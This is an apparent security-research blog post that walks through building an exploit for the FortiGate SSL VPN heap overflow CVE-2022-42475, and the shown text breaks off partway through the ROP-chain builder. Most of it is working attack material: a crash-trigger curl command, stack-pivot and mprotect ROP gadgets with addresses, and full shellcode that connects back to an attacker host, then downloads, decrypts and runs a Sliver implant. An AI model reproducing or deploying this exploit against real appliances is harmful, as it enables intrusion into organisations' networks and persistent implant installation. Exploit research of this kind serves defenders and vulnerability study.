A More Complete Exploit for Fortinet CVE-2022-42475

Share

Background

Recently, there has been some buzz about remotely exploitable vulnerabilities in Fortinet security appliances, especially FortiGate firewalls. This blog focuses on one such bug: CVE-2022-42475, a remotely exploitable heap overflow in the SSL VPN component of FortiGate and FortiProxy appliances. It was discovered in the wild by Fortinet in late 2022 during an investigation into a compromised firewall.

According to Fortinet the following specific FortiGate devices were targeted against unnamed European and African organizations:

  • FG100F
  • FG101F
  • FG200D
  • FG200E
  • FG201F
  • FG240D
  • FG3H0E
  • FG5H0E
  • FG6H1E
  • FG800D
  • FGT5HD
  • FGT60F
  • FGT80F

Our Cosmos customers were promptly notified when this vulnerability affected them. As always, we prioritize our security research efforts in order to inform our customers about zero-day vulnerabilities.

Mandiant also performed an analysis of the bug along with the BOLDMOVE malware deployed alongside the exploit. The activity was attributed to Chinese nation-state actors that discovered, weaponized, and leveraged their customized exploit to compromise sensitive networks. 

In this blog, we cover the bug, the outlines of the exploit, return-oriented programming (ROP) chains, shellcode, and optimizations. Unlike previously published research, we will share the way that an exploit can be built to target a single specific FortiGate appliance running a single specific version of FortiOS.

Since discovery and publication of details pertaining to CVE-2022-42475, a few researchers (see Prior Work below) have posted blogs and proof-of-concept (PoC) scripts that reproduce the bug and, in some cases, exploit it under highly restrictive conditions (i.e., specific appliance models and operating system versions).

Here on Team X, a specialized division within Bishop Fox's Capability Development group dedicated to vulnerability research and exploit development, we went after this bug in a deeper fashion. We are happy to report that we’ve largely succeeded in that mission and would like to share some of the journey with you.

Prior Work

We have a lot of ground to cover, so we won't be reviewing previous research in this blog. However, the publicly known state of FortiGate hacking is in its infancy, so we expect to see much more research in the future based on the work presented here and in other forums. To see details on initial work by other security researchers, check out these resources:

  • Fortinet's write-up of the bug.
  • Studyskill's work on extracting the affected/required files from FortiGate virtual machines.
  • SCRT's work on reproducing the bug.
  • Watchtowr's work on exploiting the bug.

Assumptions and Research Environment Configuration

Most of our testing was carried out against a FortiGate 100D purchased from eBay for a couple hundred dollars. It ran FortiOS 6.0.4 for the duration of the research project and sports an Intel x86_64 CPU. The remainder of testing was conducted against VMware versions of FortiGate. All FortiGate devices are Linux-based, albeit stripped down to the bare bones.

Simply being in possession of a FortiGate device is insufficient for research purposes because we needed root access to the underlying Linux OS (a.k.a. FortiOS) on hardware appliances and virtual machines to kick start our research. We determined that Fortinet did not provide a mechanism to obtain a root shell on their appliances, so we needed to hack a solution.

Getting Root Access to the 100D

To get a root shell on the 100D and to install GDB, Frida server, etc. we created a local root exploit for another FortiGate bug (CVE-2021-44168). Interestingly, much like CVE-2022-42475, CVE-2021-44168 was discovered during the investigation of a compromised FortiGate firewall. Note: we are beginning to see a pattern of a nation-state actor that has gone to great lengths to reverse-engineer Fortinet devices and create private 0-days for use against high-value targets. 

The Bug

Reproducing the Crash

Based on SCRT's and Watchtowr's work, we started with these exploit commands:

$ perl -e 'print "A"x100000' > payload 
$ curl --data-binary @payload -H 'Content-Length: 4294967297' -vik 'https://vpn.example.com:8443/remote/logincheck?AAAA=BBBB'

When we attached to the sslvpnd daemon with gdb, we saw the following crash:

(gdb) c 
Continuing.

Program received signal SIGSEGV, Segmentation fault. 
0x00007fae8fe964ee in ?? () from /fortidev/lib/x86_64-linux-gnu/libssl.so.1.1

Take a look at where it crashed:

(gdb) x/2i $rip                    
=> 0x7fae8fe964ee:      call   QWORD PTR [rax] 
   0x7fae8fe964f0:      test   eax,eax

We see that it dereferenced a function pointer stored in the rax register and called it! What's in memory at the address in rax?

(gdb) x/8x $rax  
0x7fae8b58ea00: 0x41414141      0x41414141      0x41414141      0x41414141 
0x7fae8b58ea10: 0x41414141      0x41414141      0x41414141      0x41414141

Well, well, well. Our payload appeared – what an absolute score of a result! The stars sure did align for this one.

Please note that we're not diving into the root causes of this bug. For that, please refer to Watchtowr's research on the matter. We're focused strictly on exploitation.

Identifying Exploit Mitigations

During our research, we investigated the exploit mitigation controls in FortiGate firewalls. We found the usual Linux OS-enforced data, but a few things were missing like data execution prevention (DEP), address space layout randomization (ASLR), stack canaries, and position independent executables (PIE). This trend seemed to be consistent across VMs and FortiGate hardware appliances.

Setting Exploit Goals

We wanted to drop a Sliver Linux implant onto the firewall, so we could use it as a pivot point into an organization's networks. Sliver implants are typically large (10MB is reasonable), and we found that embedding one into an HTTP POST request led to corruption every time. We simply could not inject the entire implant binary into memory reliably, and since reliability is one of the core goals of a high-quality exploit, we abandoned this approach. The root cause seemed to be the SSL VPN software scribbling over the implant data prior to the exploit being triggered. We could have written the exploit to shell out to the FortiGate's underlying Linux OS to perform a download of the Sliver implant, but there were several problems with that approach:

  • No functioning shell in FortiOS
  • No Perl, Ruby, PHP, etc., scripting languages
  • Python isn't ubiquitous and is only present on older firewalls
  • No consistent way to write a generic shell-out payload

Instead, we decided on using a more generic shellcode stager that ran in the following way:

  • Attacker runs the exploit
  • Exploit runs shellcode on the target appliance
  • Shellcode connects back to attacker and downloads an encrypted Sliver implant
  • Shellcode decrypts the Sliver implant and saves it to disk
  • Shellcode runs the Sliver implant which connects back to attacker's Sliver server

Exploiting like the 90s

If we could execute code on the heap, we would have been in good shape to just write some shellcode, put it on the heap, and execute call [rax], but Linux DEP prevents that. Instead, we had to do some ROP chaining in which we found and reused existing code "gadgets" in the FortiGate sslvpnd binary (which is actually just a symlink to a monolithic, 80MB, dynamically linked init binary).

We didn’t want to use ROP for the entire download/decrypt/execute sequence because that is too painful, and we needed to jump from ROP into shellcode as quickly as possible. The goal of our ROP chain was simple:

  • Pivot the stack pointer rsp to point at our HTTP POST payload, where the ROP chain and shellcode are stored.
  • Make the payload executable by calling mprotect(rsp & 0xfffffffffffff000, 0x5000, PROT_READ | PROT_WRITE | PROT_EXEC) on the memory region in which it is stored (the bitmask is used to align the memory address to a 4k page boundary).
  • Jump to shellcode within the payload.

Typically, ROP gadgets are built into a chain that repeats execute instructions; return; until the desired objective is met, but the second and third steps are a little more convoluted than they seem at first. Let's check it out!

Execute the Stack Pivot

At the moment call [rax] was executed (remember we controlled the address derefenced at rax), the stack pointer rsp pointed at sslvpnd’s real stack. This was useless to us because our payload wasn’t there. It was somewhere on the heap, which means we had to figure out how to put the address of our payload into rsp using only a single gadget. This is not always the case, but the complexity of multi-gadget stack pivots is outside the scope of this blog post.

Why just one gadget? At the end of a gadget, we'll typically hit a ret instruction, which pops an address off the stack at address rsp and jumps to it by placing that address into the rip register. If rsp doesn't point to our ROP chain when the ret instruction executes, then we're hosed. We have no control over the popped value, and we jump into garbage...or random instructions...or the stack. Regardless of where rip ends up, the effect is the same - insta-crash.

The easiest way to pivot was to find a pointer to our payload in one of the registers and find a gadget that does the equivalent of mov rsp, <register>; ret;. Did we have a pointer to the payload in any of the registers at the moment of exploitation? The answer in this case is yes!

Let's look at the registers at the point of crash:

(gdb) i r 
rax            0x4141414141414141  4702111234474983745 
rbx            0x7fae8b569800      140387638745088 
rcx            0x0                 0 
rdx            0x7fae8b56d4f8      140387638760696 
rsi            0x7fae8b5736a8      140387638785704 
rdi            0x7fae8b569800      140387638745088 
rbp            0x7fffe4f967e0      0x7fffe4f967e0 
rsp            0x7fffe4f94688      0x7fffe4f94688 
r8             0x4141414141414141  4702111234474983745 
r9             0x4141414141414141  4702111234474983745 
r10            0x4141414141414141  4702111234474983745 
r11            0x4141414141414141  4702111234474983745 
r12            0x7fae8b569940      140387638745408 
r13            0x7fae8b56d4f8      140387638760696 
r14            0x131d2fc0          320679872 
r15            0x7fae8b5736a8      140387638785704 
rip            0x7fae8fe964ee      140387715474670  
eflags         0x206               [ PF IF ] 
cs             0x33                51 
ss             0x2b                43 
ds             0x0                 0 
es             0x0                 0 
fs             0x0                 0 
gs             0x0                 0

Ok, what's in rdx?

(gdb) x/xg $rdx 
0x7fae8b56d4f8: 0x4141414141414141

Bingo! rdx pointed into our HTTP POST data. Therefore, the stack pivot requirements were as simple as mov rsp, rdx; ret. Sadly, there was no such gadget in the sslvpnd binary (whomp whomp). Time to hunt for more tricky gadgets!

After some fiddling with ropr, we identified the following regex that hit a few suitable gadgets: 

0x00d90512: push rdx; lodsb [rsi]; adc bl, [rbx+0x41]; pop rsp; pop rbp; ret; 
0x0130acd4: push rdx; add [rbx+0x41], ebx; pop rsp; mov qword ptr [rip+0x14792b24], 0x130aa20; pop rbp; ret; 
0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret; 
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret; 
0x0285c4b0: push rdx; mov esi, 0xc48348fd; and [rbx+0x41], bl; pop rsp; pop rbp; ret; 
 
==> Found 5 gadgets in 5.543 seconds

The simplest gadgets were:

0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret; 
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret;

Picking the gadget at address 0x01b666bc, we confirmed the gadget's existence and accuracy using Radare2:

r2 ./[redacted]/init 
 -- r2 is for the people 
[0x00447d30]> s 0x01b666bc 
[0x01b666bc]> pi 5 
push rdx 
adc byte [rbx + 0x41], bl 
pop rsp 
pop rbp 
ret

Excellent! There was only one remaining concern since this gadget had a few extraneous instructions, in particular adc byte [rbx + 0x41], bl. This instruction dereferenced and wrote to the memory address stored in the rbx register, which means rbx had to point to a valid, mapped, and writeable area of memory. If it didn’t, the gadget would crash, and we would have needed a new gadget.

We were in luck, though, because of what we found in rbx at the moment of exploitation:

(gdb) i r rbx 
rbx            0x7fae8b569800      140387638745088 
(gdb) x/xg $rbx 
0x7fae8b569800: 0x4141414141414141

That is a valid address alright – this gadget wouldn’t crash! The effective action of the stack pivot gadget (ignoring extraneous instructions) is therefore:

push rdx 
pop  rsp 
ret

Now that we had a stack pivot gadget, we proceeded to the rest of the ROP chain.

Find the mprotect(2) Function

To make our shellcode executable, we needed the address of mprotect(2) in the target binary's procedure link table (PLT). The address was easy to obtain using objdump:

objdump -D -j .plt init-6.4.9-800D | egrep 'mprotect' 
000000000042ac50 <mprotect@plt>:

The address 0x42ac50 was the trampoline for the mprotect function. If we jumped to it, we called mprotect. It is important to note that this address was valid only for this specific binary; any other version of the FortiOS init binary would have a slightly different address. For example, we used init from the FortiGate 100D 6.0.4 firmware:

objdump -D -j .plt init-6.0.4-100D | egrep 'mprotect' 
0000000000420630 <mprotect@plt>:

We saw that 0x420630 was not the same as 0x42ac50. Therefore, we needed the function PLT addresses for each version of FortiOS that we wished to exploit. More on this later! For now, we had our mprotect address. How did we use it?

Examine the Structure of mprotect

The mprotect function was not a syscall wrapper. Normally, we would have just found a gadget like syscall; ret; to call it directly, but in this case, we found that the available gadgets were of such low quality (they stomped all over a bunch of registers and memory) that we instead used a library function to call it.

Let's consider how to call mprotect

int mprotect(void *addr, size_t len, int prot);

So, we needed to do this:

#define PROT_RWX        7      // PROT_READ | PROT_WRITE | PROT_EXEC 
#define MEMORY_LENGTH   0x5000 // not important, just make it big enough for all the shellcode 
#define ALIGNED_ADDRESS address_of_shellcode & 0xfffffffffffff000 // page-aligned address 
mprotect(ALIGNED_ADDRESS, MEMORY_LENGTH, PROT_RWX);

The mprotect call had to be passed a memory address that lies on a 4k page boundary hence the logical AND operation. If the address wasn’t on a page boundary, then the call would fail.

When calling functions on x86_64 System V ABI (as used by Linux / FortiOS), the arguments were passed in the registers rdi, rsi, rdx, rcx, r8, and r9 in that order. We used the first three registers to populate the three parameters passed to mprotect:

rdi = 7 
rsi = 0x5000 
rdx = ALIGNED_ADDRESS

The first two registers were easy to set using ROP gadgets: we just did pop rdi; ret; and pop rsi; ret; and placed the values we needed onto the stack / ROP chain. Getting an aligned address into rdx was a little more difficult because we needed to do the following steps:

  • Get the memory address of our ROP chain / shellcode
  • Do the logical AND operation
  • Store the result in rdx

Get the Address of Our ROP Chain

Let's look at the registers at the point of crash:

(gdb) i r 
rax            0x4141414141414141  4702111234474983745 
rbx            0x7fae8b569800      140387638745088 
rcx            0x0                 0 
rdx            0x7fae8b56d4f8      140387638760696 
rsi            0x7fae8b5736a8      140387638785704 
rdi            0x7fae8b569800      140387638745088 
rbp            0x7fffe4f967e0      0x7fffe4f967e0 
rsp            0x7fffe4f94688      0x7fffe4f94688 
r8             0x4141414141414141  4702111234474983745 
r9             0x4141414141414141  4702111234474983745 
r10            0x4141414141414141  4702111234474983745 
r11            0x4141414141414141  4702111234474983745 
r12            0x7fae8b569940      140387638745408 
r13            0x7fae8b56d4f8      140387638760696 
r14            0x131d2fc0          320679872 
r15            0x7fae8b5736a8      140387638785704 
rip            0x7fae8fe964ee      140387715474670  
eflags         0x206               [ PF IF ] 
cs             0x33                51 
ss             0x2b                43 
ds             0x0                 0 
es             0x0                 0 
fs             0x0                 0 
gs             0x0                 0

We had the approximate address of our payload / ROP chain / shellcode in registers rbx, rdx, rdi, rsi, r12, r13, and r15. I say "approximate" because all those registers pointed to slightly different addresses within the payload. This is fine because we were rounding down to the nearest 4k page, so we didn’t care about the least significant 3 bytes. With this in consideration, we got:

rbx            0x7fae8b569800 
rdx            0x7fae8b56d4f8 
rsi            0x7fae8b5736a8 
rdi            0x7fae8b569800 
r12            0x7fae8b569940 
r13            0x7fae8b56d4f8 
r15            0x7fae8b5736a8

We discarded any address starting with 0x7fae8b57xxxx because those addresses were too far into our payload. We ran the risk of making the wrong section of memory executable. The following candidates remained:

rbx            0x7fae8b569800 
rdx            0x7fae8b56d4f8 
rdi            0x7fae8b569800 
r12            0x7fae8b569940 
r13            0x7fae8b56d4f8

We discarded the higher addresses, which left:

rbx            0x7fae8b569800 
rdi            0x7fae8b569800

rbx and rdi were our candidate registers for finding the address of our payload / ROP chain / shellcode. We wanted to perform a logical AND operation such that 0x7fae8b569800 & 0xfffffffffffff000 = 0x7fae8b569000.

Call mprotect to Make Our Payload Executable

We assembled the following gadget chain to perform the operation:

// Set up arguments #2 and #3 for mprotect 
pop rsi; ret;                  // pop 0x5000 off the "stack" (aka ROP Chain) into rsi (2nd mprotect argument) 
pop rdx; ret;                  // pop 0x7 off the "stack" into rdx (3rd mprotect argument ) 
 
// Set up argument #1 for mprotect 
pop rax; ret;                // pop 0xfffffffffff000 off the "stack"  into rax 
and rax, rdi; ret;       // do "0xfffffffffff000 & 0x7fae8b569800" and save result in rax 
 
// There is no "mov rdi, rax; ret;" gadget available, so we use this more complex variant instead. 
pop rbx; ret;                 // pop address of a NOP gadget off the "stack" into rbx 
mov rdi, rax; call rbx;  // copy page-aligned address into rdi (1st mprotect argument) 
                                     // call rbx (address of NOP gadget that simply does a RET) 
 
// We put 8 RET instructions on the ROP chain so that the NOP gadget's RET lands here. 
// You could call this a "ret sled" instead of a "nop sled". 
ret; 
ret; 
ret; 
ret; 
ret; 
ret; 
ret; 
ret; 
 
// Call mprotect 
pop rax; ret;                  // pop the mprotect PLT address of the "stack" 
jmp rax;                          // mprotect will RET and execution will continue at the next ROP instruction

We now had executable shellcode at a known address in memory.

Jump to Our Shellcode

The jump to shellcode was simple: 

// Last instruction in the ROP chain simply jumps to the stack pointer which 
// conveniently points at the next item on our payload / ROP chain / shellcode. 
jmp rsp; 
 
// Shellcode follows 
0x9090909090909090		   // NOP sled 
...

Writing the Shellcode

We applied arbitrary shellcode to the exploit because there were no disallowed characters. This made the process of writing shellcode pretty straightforward. Of course, we over-complicated this process to achieve the following goals:

  • All shellcode/payload/staging/implant/data must be encrypted in transit over the internet
  • Everything in the exploit payload must fit into a 64k buffer to avoid data corruption
  • The exploit must get feedback from the shellcode regarding its status as it runs
  • The exploit must deploy a Sliver implant onto the FortiGate firewall

Encrypt All the Things

We could have written our own crypto functions, but that wasn’t efficient. Instead, we borrowed OpenSSL's AES_set_decrypt_key and AES_cbc_encrypt functions from the FortiGate binary's PLT by using the same objdump trick we used for mprotect:

objdump -D -j .plt init-6.0.4-100D | egrep ' <(mprotect|calloc|AES_set_decrypt_key|AES_cbc_encrypt)@plt'| sed -e 's/00000000//g' -e 's/ </:/g' -e 's/@plt>://g' 
00420630:mprotect 
00424720:AES_cbc_encrypt 
00424a40:calloc 
00426d70:AES_set_decrypt_key

The exploit then patched the decryption function PLT addresses into the shellcode at runtime. For example, here's a snippet from the shellcode where the address of AES_set_decrypt_key() was marked with a placeholder until the exploit replaced it with the correct value:

# setup and call OpenSSL's AES_set_decrypt_key() 
movq   %r10,   %rdi                             # ptr to AES key bytes 
movq   $0x80,  %rsi                             # 128 (0x80) bits 
movq   %r15,   %rdx                             # AES_key struct address 
movabs $0x3333333333333333, %rax                # replaced at runtime with real GOT address 
movq   %rax,   %rcx                             # address of AES_set_decrypt_key() 
movq   %rsp,   %rbx 
addq   $0x4000,%rsp 
callq  *%rcx

Inside the exploit our code did this prior to copying the shellcode into the exploit payload buffer:

# fix up GOT function addresses in the shellcode 
shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key"))) 
shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt"))) 
shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc")))

This method allowed us to write the shellcode and make it portable across all of the versions of FortiGate that we wanted to target.

Shellcode

Speaking of shellcode, let’s take a look at it.

# assemble: as -o shellcode.o shellcode.s 
#  convert: objdump -d -M intel shellcode.o|egrep ‘^…[a-z0-’]:'|cut -c 7-28|tr ‘d ’\n'|tr ‘d‘' '|tr ‘d ’\t'|s‘d 's/\(..\)/\\x\’/g' 
 
        .global _shellcode 
        .global _readloop 
        .text

Above, we saw the preamble and a set of comments with instructions on how to convert the assembled .o file into a \x-encoded sequence of op-code bytes.

Next, we called socket(2) to create a new socket that we used to connect back from the exploited FortiGate to the attacker's internet-facing computer:

_shellcode: 
 
        # socket(2) 
        movq   $0x2,  %rdi                              # AF_INET 
        movq   $0x1,  %rsi                              # SOCK_STREAM 
        movq   $0x0,  %rdx                              # 0 
        movq   $0x29, %rax                              # 41 = 0x29 = socket syscall 
        syscall                                         # rax = socket(AF_INET, SOCK_STREAM, 0); 
        movq   %rax, %rbx                               # save socket fd in rbx

Having acquired a socket, the next step was to connect(2) to the attacker's computer. We did this by creating the required data structures in registers and then pushing them onto the stack to create a C-style struct. The comments in the code showed exactly what each byte was doing in each register:

# connect(2) 
 
        # We're going to build a hokey sockaddr_in struct using registers, then push it to the stack. 
        # Here's the struct: 
        # 
        # struct sockaddr_in { 
        #       short            sin_family;   // e.g. AF_INET 
        #       unsigned short   sin_port;     // e.g. htons(3490) 
        #       struct in_addr   sin_addr;     // see struct in_addr, below 
        #       char             sin_zero[8];  // zero this by convention 
        # }; 
        #  
        # struct in_addr { 
        #       unsigned long s_addr;          // little endian byte order IPv4 address 
        # }; 
        xorq   %rdx, %rdx                                
        pushq  %rdx                                     # push 0x0000000000000000 (sockaddr_in->sin_zero) 
        # I = IP address 
        # P = TCP port 
        # F = AF_INET 
        #         IIIIIIIIPPPPFFFF 
        movq   $0x5858585858580002, %rdx                # sockaddr_in-> sin_addr, sin_port, sin_family 
        pushq  %rdx                                     # store it after sin_zero on the stack 
        movq   %rax,  %rdi                              # %rax = sock # from socket() syscall 
        movq   $0x10, %rdx                              # sizeof(sockaddr_in) = 16 bytes 
        movq   %rsp,  %rsi                              # sockaddr_in struct is on stack @ %rsp 
        movq   $0x2a, %rax                              # connect(2) syscall 
        syscall

Once the shellcode connected to the attacker's computer it sent a quick "hello" packet containing an arbitrary 8-byte value specified by the exploit. The exploit checked the packet and verified that it contained the expected 8-byte value. If the value matched, it was assumed that the shellcode was running correctly:

# write(2) response to the stager to say hello 
        subq   $0x20,  %rsi 
        movabs $0x3838383838383838, %rax 
        movq   %rax,  (%rsi)                            # response contains whatever the exploit patched in here. 
        movq   %rbx,   %rdi                             # socket fd -> rdi 
        movq   $0x8,   %rdx                             # payload len = 8 bytes 
        movq   $0x1,   %rax                             # write(2) syscall 
        syscall                                          # connect() to hax0r host

The shellcode then expected the exploit to send a 4-byte length value followed by an encrypted data blob of that length. The data blob was eventually decrypted, saved to the filesystem of the firewall, and passed to execve to be executed as an implant. The following code read the length value and saved it in the r13 register:

# read(2) 4 bytes to use as size X for next read 
        movq   %rbx,  %rdi                              # fd -> rdi 
        movq   %rsp,  %rsi                              # stack ptr -> rsi 
        subq   $0x8,  %rsi                              # move rsi up 8 bytes (storage location) 
        movq   $0x4,  %rdx                              # read 4 bytes 
        movq   $0x0,  %rax                              # read(2) system call 
        syscall                                         # read 4 bytes from socket. use it as <size> for the next payload. 
 
        # save the payload size in r13 
        movq   (%rsi), %rdx                              # rdx = num bytes to read from socket 
        movq   %rdx,   %r13                              # save payload size in r13

We used calloc to allocate a block of memory large enough to store the incoming encrypted implant data. Note that 0x3535353535353535 was a placeholder for the address of calloc in the PLT of the FortiGate /bin/init binary and was replaced at runtime by the exploit:

# calloc(size_of_encrypted_payload) 
        movabs $0x3535353535353535, %rax 
        movq   %r13,  %rdi 
        movq   $0x1,  %rsi 
        callq  *%rax

Now that the shellcode allocated a memory region large enough for the payload, we began the process of reading the encrypted implant data:

# read(2) X bytes of payload 
        movq   %r13,   %rdx                              # encrypted payload size in bytes 
        movq   %rbx,   %rdi                              # socket fd 
        movq   %rax,   %rsi                              # address of calloc()'d buffer 
        movq   %rsi,   %r12                              # save calculated payload address in r12 
        xorq   %rcx,   %rcx                              # flags = 0 
        movq   $0x0,   %r8                               # srcaddr = NULL 
        movq   $0x0,   %r9                               # addrlen = 0 
        xorq   %r10,   %r10                              # use r10 to track total bytes read so far 
 
        # rdi = fd 
        # rsi = storage ptr 
        # rdx = num bytes to read 
        # rcx = flags 
        # r8  = NULL 
        # r9  = 0 
        # rax = 0x2d ('recvfrom' syscall #) 
        # call: recvfrom(rdi, rsi, rdx, rcx, r8, r9)  
        # r13 = size of payload 
        # r15 = num bytes left to read 
_readloop:       
        movq   $0x2d,  %rax                              # recvfrom(2) syscall 
        syscall                                          # try to read rdx <size> bytes 
        cmpq   $-0x1,  %rax 
        jle _readfinished                                # abort on error 
        addq   %rax,  %r10                               # keep track of total bytes read                                
        addq   %rax,  %rsi                               # add num bytes just read to payload buffer address 
        movq   %r13,  %r11 
        subq   %r10,  %r11 
        movq   %r11,  %rdx 
        cmpq   %r10,  %r13                               # if we read all the bytes... 
        jg _readloop                                     # ...then exit the loop, otherwise read some more 
 
_readfinished:

Now that the entire encrypted data blob was read, the shellcode wrote an "all clear" message to the exploit to let it know what stage it was at:

# we have finished reading the payload. 
        # write(0xbf) goodbye response to the stager. 
        movq   %rsp,   %rsi                             # source buffer is in rsi 
        addq   $0x8,   %rsi                             # clobber the start of the shellcode nop sled, who cares 
        movabs $0x3838383838383838, %rax 
        movq   %rax,  (%rsi)                            # response contains whatever the exploit patched in here. 
        movq   %rbx,   %rdi                             # socket fd -> rdi 
        movq   $0x8,   %rdx                             # payload len = 8 bytes 
        movq   $0x1,   %rax                             # write(2) syscall

The socket was then closed, and we no longer needed to talk to the exploit. We ran autonomously.

# close the socket 
        movq   %rbx,   %rdi                             # socket fd -> rdi 
        movq   $0x3,   %rax                             # close(2) 
        syscall                                         # close the socket

This piece of code took the randomly generated AES key (which, like most other things is patched into the shellcode at runtime) and used it to decrypt the blob we just received from the exploit:

# at this point we have the encrypted payload in memory. R12 is a pointer. 
        # create another pointer:  
        # r14 -> buffer for decrypted payload (re-use the encrypted buffer!) 
        movq   %r12,   %r14 
         
        # r15 -> AES_key struct (244 bytes, but allow more) 
        movq   %rsp,   %rdx 
        subq   $0x200, %rdx 
        movq   %rdx,   %r15 
 
        # r10 -> actual AES key (16 bytes) 
        subq   $0x10,  %rdx 
        movq   %rdx,   %r10 
 
        # r11 -> iv 
        subq   $0x10,  %rdx 
        movq   %rdx,   %r11 
 
        # reminder of things in callee-saved regs at this stage: 
        #  r12 = ptr to encrypted payload 
        #  r13 = length of encrypted payload 
        #  r14 = ptr to buffer for decrypted payload 
        #  r15 = OpenSSL AES_key struct 
        # and caller-saved: 
        #  r10 = AES key 
        #  r11 = iv 
 
        # These placeholders will be patched by the exploit at runtime. 
        # The patched bytes are a one-time-use 128-bit AES key used by the exploit  
        # to encrypt the payload we just received. We’ll decrypt it next. 
        # First let’s push the 16-byte key onto the stack. 
        movabs $0x3030303030303030, %rax 
        movq   %r10,   %rdx 
        movq   %rax,   (%rdx)                      
        movabs $0x3131313131313131, %rax 
        movq   %rax,   0x8(%rdx, 1) 
 
        # put the IV adjacent to the AES key on the stack 
        movabs $0x0,   %rax 
        movq   %r11,   %rdx 
        movq   %rax,   (%rdx) 
        movq   %rax,   0x8(%rdx, 1) 
 
        # setup and call OpenSSL’s AES_set_decrypt_key() 
        movq   %r10,   %rdi                             # ptr to AES key bytes 
        movq   $0x80,  %rsi                             # 128 (0x80) bits 
        movq   %r15,   %rdx                             # AES_key struct address 
        movabs $0x3333333333333333, %rax                # replaced at untime with real GOT address 
        movq   %rax,   %rcx                             # address of AES_set_decrypt_key() 
        movq   %rsp,   %rbx 
        addq   $0x4000,%rsp 
        callq  *%rcx 
        movq   %rbx,   %rsp 
 
        # setup and call OpenSSL’s AES_cbc_encrypt() 
        movq   %r12,   %rdi                             # encrypted data 
        movq   %r14,   %rsi                             # buffer for decrypted data 
        movq   %r13,   %rdx                             # encrypted data length 
        movq   %r15,   %rcx                             # OpenSSL AES_key struct  
        movq   %r15,   %r8                               
        subq   $0x20,  %r8                              # iv 
        movq   $0x0,   %r9                              # AES_DECRYPT 
        movabs $0x3434343434343434, %rax                # AES_cbc_encrypt() 
        movq   %rsp,   %rbx 
        addq   $0x4000,%rsp 
        callq  *%rax 
        movq   %rbx,   %rsp

At this point the implant has been decrypted in memory so time to write it to disk:

# write the cleartext payload to disk 
 
        # open("/tmp/x", O_CREAT | O_RDWR) 
        movabs $0x00782f706d742f, %rax                  # /tmp/x\x00 
        movq   %rsp,   %rdi                             # stack ptr -> rdi 
        subq   $0x8,   %rdi                             # we'll place filename at rsp-8 
        movq   %rax,   (%rdi)                           # store filename on stack at rsp-8 
        movq   $0x42,  %rsi                             # O_CREAT | O_RDWR 
        movq   $0x1ff, %rdx                             # 0777 & OS umask = 0755 = executable by all 
        movq   $0x2,   %rax                             # open(2) 
        syscall                                         # open("/tmp/x", O_CREAT | O_RDWR, 0777); 
 
        # write(payload) to "/tmp/x" 
        # The value 0x3232323232323232 will be patched at runtime by the exploit and  
        # contains the real length of the payload, not the padded length used for AES CBC. 
        movq   %rax,   %rdi                             # /tmp/x fd -> rdi 
        movq   %rax,   %r13                             # save a copy of the fd 
        movq   %r14,   %rsi                             # decrypted payload address -> rsi 
        movabs $0x3232323232323232, %rax                # payload len -> rdx 
        movq   %rax,   %rdx 
        movq   $0x1,   %rax                             # write(2) syscall 
        syscall                                         # write payload to /tmp/x 
         
        # close "/tmp/x"                                 
        movq   %r13,   %rdi                             # file fd -> rdi 
        movq   $0x3,   %rax                             # close(2) 
        syscall                                         # close the /tmp/x file descriptor

The last stage is to execute the payload via the execve syscall:

# call execve() 
        movabs $0x00782f706d742f, %rax                  # /tmp/x\x00 
        movq   %rax,   (%r12)                           # "/tmp/x\x00" into mem @ r14 
        movq   %r12,   %rdi                             # address of /tmp/x into rdi 
        movq   $0x0,   %rsi 
        movq   $0x0,   %rdx 
        movq   $0x3b,  %rax                             # execve syscall 
        syscall

We're good netizens, so we made an exit from the child process to avoid a crash. The FortiGate firewall has a watchdog that restarts dead processes automatically and things tidy themselves up after this part is complete.

_final: 
        # call _exit()                                  # exit cleanly. The watchdog restarts sslvpnd. 
        movq   $0xe7,  %rax 
        xorq   %rax,   %rax 
        syscall 
 
####### EOF is never reached ########

A Quick Recap

At this stage we've covered:

  • The bug
  • The PoC / trigger
  • The stages of the exploit
  • Obtaining the necessary addresses
  • A little bit on ROP
  • Writing shellcode

The glue that held all this together is the ROP chain. We used a light-weight Python class to simplify the construction of the ROP chain.

Create a ROP Chain

Take at look at how we built an ROP chain:

rop.clear_gadget_chain()

req = bytearray(b"") 
req  += b"POST /remote/logincheck?magic=aaa HTTP/1.1\r\nHost: " + self.host.encode() + b": " + str(self.port).encode() + b"\r\nContent-Length: " + CONTENT_LENGTH + b"\r\nUser-Agent: AAAAAAAAAAAAAAAA\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n\r\n" 
 
# Just padding the start of the ROP buffer 
rop.add_padding(HEAD_PAD_LENGTH-2)    # this is of no consequense 
 
# Stage 2 - The stack pivot gadget dumps us here. 
# Stage 2.5 - "slide" down the stack by popping RETs 
# The hit a "add rsp, 0x18" to add 0x18 (24) bytes to $rsp. 
# We do this to "jump over" the stack pivot gadget and land in ~ 100kb of space that we control. 
# Not all platforms will give us a "add rsp, 0x18" gadget, but we might get "add rsp, xxx", so 
# we use RET to get us right up to the pivot and then jump over it using whatever gadget we can. 
# We land in another RET sled to account for not knowing the jump size in advance. 
rop.add_gadget("ret;", 23) 
rop.add_gadget("add rsp, 0x18; ret;")      
 
# Stage 1 - Entry point of the ROP chain. 
#  
# The exploit sets $rip to the address of STACK_PIVOT_GADGET then RETs to stage 2, above. 
# This part will be jumped over by stage 2.5, above. 
rop.add_gadget("push rdx; adc byte [rbx + 0x41], bl; pop rsp; pop rbp; ret;") # Entry point: overwrite rip with the stack pivot gadget. 
 
# Stage 3 - RET sled 
#  
rop.add_gadget("ret;", 32)              # RET sled consists of 32 RET instructions 
 
# Stage 4 - Calculate aligned memory page for stack address 
rop.add_gadget("pop rax; ret;") 
rop.add_immediate(0xfffffffffffff000) 
 
rop.add_gadget("and rax, rdi; ret;") 
rop.add_gadget("pop rbx; ret;") 
rop.add_gadget("add rsp, 0x18; ret;") 
 
rop.add_gadget("mov rdi, rax; call rbx;") 
rop.add_gadget("ret;", 8) 
 
rop.add_gadget("pop rsi; ret;") 
